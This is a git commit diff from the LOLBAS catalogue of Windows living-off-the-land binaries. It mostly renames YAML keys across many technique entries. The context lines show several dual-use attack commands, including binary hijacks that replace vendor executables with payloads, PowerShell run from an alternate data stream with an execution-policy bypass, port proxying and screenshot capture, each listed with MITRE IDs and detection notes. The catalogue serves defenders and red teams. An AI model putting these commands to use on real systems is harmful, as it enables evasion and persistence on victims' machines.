Major changes to Web portal - Small fixes to source files to adjust

2024-10-22 16:49:11 +02:00 · 2018-12-10 14:28:12 +01:00 · 2018-12-10 14:28:12 +01:00 · 94368c1e69
commit 94368c1e69
parent 2b77add5b4
113 changed files with 233 additions and 232 deletions
--- a/YML-Template.yml
+++ b/YML-Template.yml
@ -7,7 +7,7 @@ Commands:
  - Command: The command
    Description: Description of the command
    Usecase: A description of the usecase
-    Category: Execution
+    Category: Execute
    Privileges: Required privs
    MitreID: T1055
    MitreLink: https://attack.mitre.org/wiki/Technique/T1055
@ -15,15 +15,15 @@ Commands:
  - Command: The second command
    Description: Description of the second command
    Usecase: A description of the usecase
-    Category: AWL-Bypass
+    Category: AWL Bypass
    Privileges: Required privs
    MitreID: T1033
    MitreLink: https://attack.mitre.org/wiki/Technique/T1033
    OperatingSystem: Windows 10 All
-Full Path:
+Full_Path:
 - Path: c:\windows\system32\bin.exe
 - Path: c:\windows\syswow64\bin.exe
-Code Sample: 
+Code_Sample: 
 - Code: http://url.com/git.txt
 Detection: 
 - IOC: Event ID 10
--- a/yml/LOLUtilz/OSBinaries/Explorer.yml
+++ b/yml/LOLUtilz/OSBinaries/Explorer.yml
@ -7,10 +7,10 @@ Categories: []
 Commands:
  - Command: explorer.exe calc.exe
    Description: 'Executes calc.exe as a subprocess of explorer.exe.'
-Full Path:
+Full_Path:
  - c:\windows\explorer.exe
  - c:\windows\sysWOW64\explorer.exe
-Code Sample: []
+Code_Sample: []
 Detection: []
 Resources:
  - https://twitter.com/bohops/status/986984122563391488
--- a/yml/LOLUtilz/OSBinaries/Netsh.yml
+++ b/yml/LOLUtilz/OSBinaries/Netsh.yml
@ -13,10 +13,10 @@ Commands:
    Description: Load (execute) NetSh.exe helper DLL file.
  - Command: netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1
    Description: Forward traffic from the listening address and proxy to a remote system.
-Full Path:
+Full_Path:
  - C:\Windows\System32
  - C:\Windows\SysWOW64
-Code Sample: []
+Code_Sample: []
 Detection: []
 Resources:
  - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Persistence/Netsh_Helper_DLL.md
--- a/yml/LOLUtilz/OSBinaries/Nltest.yml
+++ b/yml/LOLUtilz/OSBinaries/Nltest.yml
@ -7,9 +7,9 @@ Categories: []
 Commands:
  - Command: nltest.exe /SERVER:192.168.1.10 /QUERY
    Description: ''
-Full Path:
+Full_Path:
  - c:\windows\system32\nltest.exe
-Code Sample: []
+Code_Sample: []
 Detection: []
 Resources:
  - https://twitter.com/sysopfb/status/986799053668139009
--- a/yml/LOLUtilz/OSBinaries/Openwith.yml
+++ b/yml/LOLUtilz/OSBinaries/Openwith.yml
@ -9,10 +9,10 @@ Commands:
    Description: Opens the target file with the default application.
  - Command: OpenWith.exe /c C:\testing.msi
    Description: Opens the target file with the default application.
-Full Path:
+Full_Path:
  - c:\windows\system32\Openwith.exe
  - c:\windows\sysWOW64\Openwith.exe
-Code Sample: []
+Code_Sample: []
 Detection: []
 Resources:
  - https://twitter.com/harr0ey/status/991670870384021504
--- a/yml/LOLUtilz/OSBinaries/Powershell.yml
+++ b/yml/LOLUtilz/OSBinaries/Powershell.yml
@ -7,10 +7,10 @@ Categories: []
 Commands:
  - Command: powershell -ep bypass - < c:\temp:ttt
    Description: Execute the encoded PowerShell command stored in an Alternate Data Stream (ADS).
-Full Path:
+Full_Path:
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
-Code Sample: []
+Code_Sample: []
 Detection: []
 Resources:
  - https://twitter.com/Moriarty_Meng/status/984380793383370752
--- a/yml/LOLUtilz/OSBinaries/Psr.yml
+++ b/yml/LOLUtilz/OSBinaries/Psr.yml
@ -11,10 +11,10 @@ Commands:
    Description: Capture a maximum of 100 screenshots of the desktop and save them in the target .ZIP file.
  - Command: psr.exe /stop
    Description: Stop the Problem Step Recorder.
-Full Path:
+Full_Path:
  - C:\Windows\System32\Psr.exe
  - C:\Windows\SysWOW64\Psr.exe
-Code Sample: []
+Code_Sample: []
 Detection: []
 Resources:
  - https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf
--- a/yml/LOLUtilz/OSBinaries/Robocopy.yml
+++ b/yml/LOLUtilz/OSBinaries/Robocopy.yml
@ -9,10 +9,10 @@ Commands:
    Description: Copy the entire contents of the SourceFolder to the DestFolder.
  - Command: Robocopy.exe \\SERVER\SourceFolder C:\DestFolder
    Description: Copy the entire contents of the SourceFolder to the DestFolder.
-Full Path:
+Full_Path:
  - c:\windows\system32\binary.exe
  - c:\windows\sysWOW64\binary.exe
-Code Sample: []
+Code_Sample: []
 Detection: []
 Resources:
  - https://social.technet.microsoft.com/wiki/contents/articles/1073.robocopy-and-a-few-examples.aspx
--- a/yml/LOLUtilz/OtherBinaries/AcroRd32.yml
+++ b/yml/LOLUtilz/OtherBinaries/AcroRd32.yml
@ -7,9 +7,9 @@ Categories: []
 Commands:
  - Command: Replace C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe by your binary
    Description: Hijack RdrCEF.exe with a payload executable to launch when opening Adobe
-Full Path:
+Full_Path:
  - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\
-Code Sample: []
+Code_Sample: []
 Detection: []
 Resources:
  - https://twitter.com/pabraeken/status/997997818362155008
--- a/yml/LOLUtilz/OtherBinaries/Gpup.yml
+++ b/yml/LOLUtilz/OtherBinaries/Gpup.yml
@ -7,9 +7,9 @@ Categories: []
 Commands:
  - Command: Gpup.exe -w whatever -e c:\Windows\System32\calc.exe
    Description: Execute another command through gpup.exe (Notepad++ binary).
-Full Path:
+Full_Path:
  - 'C:\Program Files (x86)\Notepad++\updater\gpup.exe    '
-Code Sample: []
+Code_Sample: []
 Detection: []
 Resources:
  - https://twitter.com/pabraeken/status/997892519827558400
--- a/yml/LOLUtilz/OtherBinaries/Nlnotes.yml
+++ b/yml/LOLUtilz/OtherBinaries/Nlnotes.yml
@ -7,9 +7,9 @@ Categories: []
 Commands:
  - Command: NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
    Description: Run PowerShell via LotusNotes.
-Full Path:
+Full_Path:
  - C:\Program Files (x86)\IBM\Lotus\Notes\Notes.exe
-Code Sample: []
+Code_Sample: []
 Detection: []
 Resources:
  - https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
--- a/yml/LOLUtilz/OtherBinaries/Notes.yml
+++ b/yml/LOLUtilz/OtherBinaries/Notes.yml
@ -7,9 +7,9 @@ Categories: []
 Commands:
  - Command: Notes.exe "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
    Description: Run PowerShell via LotusNotes.
-Full Path:
+Full_Path:
  - C:\Program Files (x86)\IBM\Lotus\Notes\notes.exe
-Code Sample: []
+Code_Sample: []
 Detection: []
 Resources:
  - https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
--- a/yml/LOLUtilz/OtherBinaries/Nvudisp.yml
+++ b/yml/LOLUtilz/OtherBinaries/Nvudisp.yml
@ -17,9 +17,9 @@ Commands:
    Description: Kill a process.
  - Command: Nvudisp.exe Run foo
    Description: Run process
-Full Path:
+Full_Path:
  - C:\windows\system32\nvuDisp.exe
-Code Sample: []
+Code_Sample: []
 Detection: []
 Resources:
  - http://sysadminconcombre.blogspot.ca/2018/04/run-system-commands-through-nvidia.html
--- a/yml/LOLUtilz/OtherBinaries/Nvuhda6.yml
+++ b/yml/LOLUtilz/OtherBinaries/Nvuhda6.yml
@ -17,9 +17,9 @@ Commands:
    Description: Kill a process.
  - Command: nvuhda6.exe Run foo
    Description: Run process
-Full Path:
+Full_Path:
  - Missing
-Code Sample: []
+Code_Sample: []
 Detection: []
 Resources:
  - http://www.hexacorn.com/blog/2017/11/10/reusigned-binaries-living-off-the-signed-land/
--- a/yml/LOLUtilz/OtherBinaries/ROCCAT_Swarm.yml
+++ b/yml/LOLUtilz/OtherBinaries/ROCCAT_Swarm.yml
@ -7,9 +7,9 @@ Categories: []
 Commands:
  - Command: Replace ROCCAT_Swarm_Monitor.exe with your binary.exe
    Description: Hijack ROCCAT_Swarm_Monitor.exe and launch payload when executing ROCCAT_Swarm.exe
-Full Path:
+Full_Path:
  - C:\Program Files (x86)\ROCCAT\ROCCAT Swarm\
-Code Sample: []
+Code_Sample: []
 Detection: []
 Resources:
  - https://twitter.com/pabraeken/status/994213164484001793
--- a/yml/LOLUtilz/OtherBinaries/Setup.yml
+++ b/yml/LOLUtilz/OtherBinaries/Setup.yml
@ -7,9 +7,9 @@ Categories: []
 Commands:
  - Command: Run Setup.exe
    Description: Hijack hpbcsiServiceMarshaller.exe and run Setup.exe to launch a payload.
-Full Path:
+Full_Path:
  - C:\LJ-Ent-700-color-MFP-M775-Full-Solution-15315
-Code Sample: []
+Code_Sample: []
 Detection: []
 Resources:
  - https://twitter.com/pabraeken/status/994381620588236800
--- a/yml/LOLUtilz/OtherBinaries/Usbinst.yml
+++ b/yml/LOLUtilz/OtherBinaries/Usbinst.yml
@ -7,9 +7,9 @@ Categories: []
 Commands:
  - Command: Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf"
    Description: Execute calc.exe through DefaultInstall Section Directive in INF file.
-Full Path:
+Full_Path:
  - C:\Program Files (x86)\Citrix\ICA Client\Drivers64\Usbinst.exe
-Code Sample: []
+Code_Sample: []
 Detection: []
 Resources:
  - https://twitter.com/pabraeken/status/993514357807108096
--- a/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml
+++ b/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml
@ -7,9 +7,9 @@ Categories: []
 Commands:
  - Command: VBoxDrvInst.exe driver executeinf c:\temp\calc.inf
    Description: Set registry key-value for persistance via INF file call through VBoxDrvInst.exe
-Full Path:
+Full_Path:
  - C:\Program Files\Oracle\VirtualBox Guest Additions
-Code Sample: []
+Code_Sample: []
 Detection: []
 Resources:
  - https://twitter.com/pabraeken/status/993497996179492864
--- a/yml/LOLUtilz/OtherMSBinaries/Winword.yml
+++ b/yml/LOLUtilz/OtherMSBinaries/Winword.yml
@ -12,9 +12,9 @@ Commands:
    MitreID: T1218
    MItreLink: https://attack.mitre.org/wiki/Technique/T1218
    OperatingSystem: Windows
-Full Path:
+Full_Path:
  - Path: c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
-Code Sample:
+Code_Sample:
  - Code:
 Detection:
  - IOC:
--- a/yml/LOLUtilz/OtherScripts/Testxlst.yml
+++ b/yml/LOLUtilz/OtherScripts/Testxlst.yml
@ -18,9 +18,9 @@ Commands:
    MitreID: T1064
    MitreLink: https://attack.mitre.org/wiki/Technique/T1064
    OperatingSystem: Windows
-Full Path:
+Full_Path:
  - c:\python27amd64\Lib\site-packages\win32com\test\testxslt.js (Visual Studio Installation)
-Code Sample: []
+Code_Sample: []
 Detection: []
 Resources:
  - https://twitter.com/bohops/status/993314069116485632
--- a/yml/OSBinaries/Atbroker.yml
+++ b/yml/OSBinaries/Atbroker.yml
@ -12,10 +12,10 @@ Commands:
    MitreID: T1218
    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
    OperatingSystem: Windows 8, Windows 8.1, Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\Atbroker.exe
  - Path: C:\Windows\SysWOW64\Atbroker.exe
-Code Sample: 
+Code_Sample: 
 - Code:
 Detection:
 - IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration
--- a/yml/OSBinaries/Bash.yml
+++ b/yml/OSBinaries/Bash.yml
@ -20,10 +20,10 @@ Commands:
    MitreID: T1218
    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
    OperatingSystem: Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\bash.exe
  - Path: C:\Windows\SysWOW64\bash.exe
-Code Sample: 
+Code_Sample: 
  - Code:
 Detection:
  - IOC: Child process from bash.exe
--- a/yml/OSBinaries/Bitsadmin.yml
+++ b/yml/OSBinaries/Bitsadmin.yml
@ -36,10 +36,10 @@ Commands:
    MitreID: T1218
    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\bitsadmin.exe
  - Path: C:\Windows\SysWOW64\bitsadmin.exe
-Code Sample: 
+Code_Sample: 
  - Code:
 Detection:
  - IOC: Child process from bitsadmin.exe
--- a/yml/OSBinaries/Certutil.yml
+++ b/yml/OSBinaries/Certutil.yml
@ -36,10 +36,10 @@ Commands:
    MitreID: T1140
    MitreLink: https://attack.mitre.org/wiki/Technique/T1140
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\certutil.exe
  - Path: C:\Windows\SysWOW64\certutil.exe
-Code Sample: 
+Code_Sample: 
  - Code:
 Detection:
  - IOC: Certutil.exe creating new files on disk
--- a/yml/OSBinaries/Cmdkey.yml
+++ b/yml/OSBinaries/Cmdkey.yml
@ -12,10 +12,10 @@ Commands:
    MitreID: T1078
    MitreLink: https://attack.mitre.org/wiki/Technique/T1078
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\cmdkey.exe
  - Path: C:\Windows\SysWOW64\cmdkey.exe
-Code Sample: 
+Code_Sample: 
 - Code:
 Detection:
 - IOC: Usage of this command could be an IOC
--- a/yml/OSBinaries/Cmstp.yml
+++ b/yml/OSBinaries/Cmstp.yml
@ -20,10 +20,10 @@ Commands:
    MitreID: T1191
    MitreLink: https://attack.mitre.org/wiki/Technique/T1191
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\cmstp.exe
  - Path: C:\Windows\SysWOW64\cmstp.exe
-Code Sample: 
+Code_Sample: 
 - Code:
 Detection:
 - IOC: Execution of cmstp.exe should not be normal unless VPN is in use
--- a/yml/OSBinaries/Control.yml
+++ b/yml/OSBinaries/Control.yml
@ -12,10 +12,10 @@ Commands:
    MitreID: T1196
    MitreLink: https://attack.mitre.org/wiki/Technique/T1196
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\control.exe
  - Path: C:\Windows\SysWOW64\control.exe
-Code Sample: 
+Code_Sample: 
 - Code:
 Detection:
 - IOC: Control.exe executing files from alternate data streams.
--- a/yml/OSBinaries/Csc.yml
+++ b/yml/OSBinaries/Csc.yml
@ -20,10 +20,10 @@ Commands:
    MitreID: T1127
    MitreLink: https://attack.mitre.org/wiki/Technique/T1127
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe
-Code Sample: 
+Code_Sample: 
 - Code:
 Detection:
 - IOC: Csc.exe should normally not run a system unless it is used for development. 
--- a/yml/OSBinaries/Cscript.yml
+++ b/yml/OSBinaries/Cscript.yml
@ -12,10 +12,10 @@ Commands:
    MitreID: T1096
    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\cscript.exe
  - Path: C:\Windows\SysWOW64\cscript.exe
-Code Sample: 
+Code_Sample: 
 - Code:
 Detection:
 - IOC: Cscript.exe executing files from alternate data streams
--- a/yml/OSBinaries/Dfsvc.yml
+++ b/yml/OSBinaries/Dfsvc.yml
@ -12,12 +12,12 @@ Commands:
    MitreID: T1127
    MitreLink: https://attack.mitre.org/wiki/Technique/T1127
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe
  - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
-Code Sample: 
+Code_Sample: 
 - Code:
 Detection:
 - IOC: 
--- a/yml/OSBinaries/Diskshadow.yml
+++ b/yml/OSBinaries/Diskshadow.yml
@ -20,10 +20,10 @@ Commands:
    MitreID: T1003
    MitreLink: https://attack.mitre.org/wiki/Technique/T1003
    OperatingSystem: Windows server
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\diskshadow.exe
  - Path: C:\Windows\SysWOW64\diskshadow.exe
-Code Sample: 
+Code_Sample: 
 - Code:
 Detection:
 - IOC: Child process from diskshadow.exe
--- a/yml/OSBinaries/Dnscmd.yml
+++ b/yml/OSBinaries/Dnscmd.yml
@ -12,10 +12,10 @@ Commands:
    MitreID: T1035
    MitreLink: https://attack.mitre.org/wiki/Technique/T1035
    OperatingSystem: Windows server
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\Dnscmd.exe
  - Path: C:\Windows\SysWOW64\Dnscmd.exe
-Code Sample: 
+Code_Sample: 
 - Code:
 Detection:
 - IOC: Dnscmd.exe loading dll from UNC path
--- a/yml/OSBinaries/Esentutl.yml
+++ b/yml/OSBinaries/Esentutl.yml
@ -44,10 +44,10 @@ Commands:
    MitreID: T1096
    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\esentutl.exe
  - Path: C:\Windows\SysWOW64\esentutl.exe
-Code Sample: 
+Code_Sample: 
 - Code:
 Detection:
 - IOC: 
--- a/yml/OSBinaries/Expand.yml
+++ b/yml/OSBinaries/Expand.yml
@ -28,10 +28,10 @@ Commands:
    MitreID: T1096
    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\Expand.exe
  - Path: C:\Windows\SysWOW64\Expand.exe
-Code Sample: 
+Code_Sample: 
 - Code:
 Detection:
 - IOC: 
--- a/yml/OSBinaries/Extexport.yml
+++ b/yml/OSBinaries/Extexport.yml
@ -12,10 +12,10 @@ Commands:
    MitreID: T1218
    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Program Files\Internet Explorer\Extexport.exe
  - Path: C:\Program Files\Internet Explorer(x86)\Extexport.exe
-Code Sample: 
+Code_Sample: 
 - Code:
 Detection:
 - IOC: Extexport.exe loads dll and is execute from other folder the original path
--- a/yml/OSBinaries/Extrac32.yml
+++ b/yml/OSBinaries/Extrac32.yml
@ -28,10 +28,10 @@ Commands:
    MitreID: T1105
    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\extrac32.exe
  - Path: C:\Windows\SysWOW64\extrac32.exe
-Code Sample: 
+Code_Sample: 
 - Code:
 Detection:
 - IOC: 
--- a/yml/OSBinaries/Findstr.yml
+++ b/yml/OSBinaries/Findstr.yml
@ -36,10 +36,10 @@ Commands:
    MitreID: T1185
    MitreLink: https://attack.mitre.org/wiki/Technique/T1185
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\findstr.exe
  - Path: C:\Windows\SysWOW64\findstr.exe
-Code Sample: 
+Code_Sample: 
 - Code:
 Detection:
 - IOC: finstr.exe should normally not be invoked on a client system
--- a/yml/OSBinaries/Forfiles.yml
+++ b/yml/OSBinaries/Forfiles.yml
@ -20,10 +20,10 @@ Commands:
    MitreID: T1096
    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\forfiles.exe
  - Path: C:\Windows\SysWOW64\forfiles.exe
-Code Sample: 
+Code_Sample: 
 - Code:
 Detection:
 - IOC: 
--- a/yml/OSBinaries/Gpscript.yml
+++ b/yml/OSBinaries/Gpscript.yml
@ -20,10 +20,10 @@ Commands:
    MitreID: T1216
    MitreLink: https://attack.mitre.org/wiki/Technique/T1216
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\gpscript.exe
  - Path: C:\Windows\SysWOW64\gpscript.exe
-Code Sample: 
+Code_Sample: 
 - Code:
 Detection:
 - IOC: Scripts added in local group policy
--- a/yml/OSBinaries/Hh.yml
+++ b/yml/OSBinaries/Hh.yml
@ -20,10 +20,10 @@ Commands:
    MitreID: T1216
    MitreLink: https://attack.mitre.org/wiki/Technique/T1216
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\hh.exe
  - Path: C:\Windows\SysWOW64\hh.exe
-Code Sample: 
+Code_Sample: 
 - Code:
 Detection:
 - IOC: hh.exe should normally not be in use on a normal workstation
--- a/yml/OSBinaries/Ie4unit.yml
+++ b/yml/OSBinaries/Ie4unit.yml
@ -12,12 +12,12 @@ Commands:
    MitreID: T1218
    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full Path:
+Full_Path:
  - Path: c:\windows\system32\ie4unit.exe
  - Path: c:\windows\sysWOW64\ie4unit.exe
  - Path: c:\windows\system32\ieuinit.inf
  - Path: c:\windows\sysWOW64\ieuinit.inf
-Code Sample: 
+Code_Sample: 
 - Code:
 Detection:
 - IOC: ie4unit.exe loading a inf file from outside %windir%
--- a/yml/OSBinaries/Ieexec.yml
+++ b/yml/OSBinaries/Ieexec.yml
@ -20,10 +20,10 @@ Commands:
    MitreID: T1218
    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe
-Code Sample: 
+Code_Sample: 
  - Code:
 Detection:
  - IOC: 
--- a/yml/OSBinaries/Infdefaultinstall.yml
+++ b/yml/OSBinaries/Infdefaultinstall.yml
@ -12,10 +12,10 @@ Commands:
    MitreID: T1218
    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\Infdefaultinstall.exe
  - Path: C:\Windows\SysWOW64\Infdefaultinstall.exe
-Code Sample: 
+Code_Sample: 
 - Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
 Detection:
 - IOC:
--- a/yml/OSBinaries/Installutil.yml
+++ b/yml/OSBinaries/Installutil.yml
@ -20,12 +20,12 @@ Commands:
    MitreID: T1118
    MitreLink: https://attack.mitre.org/wiki/Technique/T1118
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe
  - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
-Code Sample: 
+Code_Sample: 
 - Code:
 Detection:
 - IOC:
--- a/yml/OSBinaries/Makecab.yml
+++ b/yml/OSBinaries/Makecab.yml
@ -15,7 +15,7 @@ Commands:
  - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab
    Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
    Usecase: Hide data compressed into an alternate data stream
-    Category: Alternate data streams
+    Category: ADS
    Privileges: User
    MitreID: T1096
    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
@ -28,10 +28,10 @@ Commands:
    MitreID: T1105
    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\makecab.exe
  - Path: C:\Windows\SysWOW64\makecab.exe
-Code Sample: 
+Code_Sample: 
 - Code:
 Detection:
 - IOC: Makecab getting files from Internet
--- a/yml/OSBinaries/Mavinject.yml
+++ b/yml/OSBinaries/Mavinject.yml
@ -20,10 +20,10 @@ Commands:
    MitreID: T1096
    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\mavinject.exe
  - Path: C:\Windows\SysWOW64\mavinject.exe
-Code Sample: 
+Code_Sample: 
 - Code:
 Detection:
 - IOC: mavinject.exe should not run unless APP-v is in use on the workstation
--- a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml
+++ b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml
@ -7,7 +7,7 @@ Commands:
  - Command: Microsoft.Worflow.Compiler.exe tests.xml results.xml
    Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.xml file.
    Usecase: Compile and run code
-    Category: Execution
+    Category: Execute
    Privileges: User
    MitreID: T1127
    MitreLink: https://attack.mitre.org/wiki/Technique/T1127
@ -28,9 +28,9 @@ Commands:
    MitreID: T1127
    MitreLink: https://attack.mitre.org/wiki/Technique/T1127
    OperatingSystem: Windows 10S 
-Full Path:
+Full_Path:
  - Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
-Code Sample: 
+Code_Sample: 
 - Code:
 Detection:
 - IOC: Microsoft.Workflow.Compiler.exe would not normally be run on workstations.
--- a/yml/OSBinaries/Mmc.yml
+++ b/yml/OSBinaries/Mmc.yml
@ -12,10 +12,10 @@ Commands:
    MitreID: T1218
    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
    OperatingSystem: Windows 10 (and possibly earlier versions)
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\mmc.exe
  - Path: C:\Windows\SysWOW64\mmc.exe
-Code Sample: 
+Code_Sample: 
 - Code:
 Detection:
 - IOC: 
--- a/yml/OSBinaries/Msbuild.yml
+++ b/yml/OSBinaries/Msbuild.yml
@ -20,14 +20,14 @@ Commands:
    MitreID: T1127
    MitreLink: https://attack.mitre.org/wiki/Technique/T1127
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe
  - Path: C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe
  - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe
-Code Sample: 
+Code_Sample: 
 - Code:
 Detection:
 - IOC: Msbuild.exe should not normally be executed on workstations
--- a/yml/OSBinaries/Msconfig.yml
+++ b/yml/OSBinaries/Msconfig.yml
@ -12,9 +12,9 @@ Commands:
    MitreID: T1218
    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\msconfig.exe
-Code Sample: 
+Code_Sample: 
 - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/mscfgtlc.xml
 Detection:
 - IOC: mscfgtlc.xml changes in system32 folder
--- a/yml/OSBinaries/Msdt.yml
+++ b/yml/OSBinaries/Msdt.yml
@ -20,10 +20,10 @@ Commands:
    MitreID: T1218
    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\Msdt.exe
  - Path: C:\Windows\SysWOW64\Msdt.exe
-Code Sample: 
+Code_Sample: 
 - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/PCW8E57.xml
 Detection:
 - IOC: 
--- a/yml/OSBinaries/Mshta.yml
+++ b/yml/OSBinaries/Mshta.yml
@ -36,10 +36,10 @@ Commands:
    MitreID: T1170
    MitreLink: https://attack.mitre.org/wiki/Technique/T1170
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\mshta.exe
  - Path: C:\Windows\SysWOW64\mshta.exe
